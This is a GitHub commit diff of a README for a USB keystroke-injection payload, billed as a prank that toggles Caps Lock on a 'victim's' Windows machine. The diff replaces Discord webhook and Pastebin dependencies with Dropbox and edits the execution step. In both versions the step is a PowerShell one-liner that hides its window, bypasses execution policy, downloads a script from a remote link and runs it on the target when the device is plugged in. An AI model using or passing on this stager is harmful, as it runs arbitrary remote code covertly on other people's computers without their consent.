Add files via upload

pull/112/head
atomic 2022-11-21 17:07:30 -05:00 committed by GitHub
parent b4a74de407
commit 22a1210304
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 5 deletions

View File

@ -29,19 +29,17 @@ This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
### Dependencies ### Dependencies
* Pastebin or other file sharing service, Discord webhook or other webhook service * Dropbox or other file sharing service
* Windows 10,11 * Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks
<p align="right">(<a href="#top">back to top</a>)</p> <p align="right">(<a href="#top">back to top</a>)</p>
### Executing program ### Executing program
* Plug in your device * Plug in your device
* Define the `DEFINE TARGET_URL example.com` * Device will download the file and place them in proper directories to then run the script
* Device will download both files and place them in proper directories to then run the script
``` ```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl
``` ```
<p align="right">(<a href="#top">back to top</a>)</p> <p align="right">(<a href="#top">back to top</a>)</p>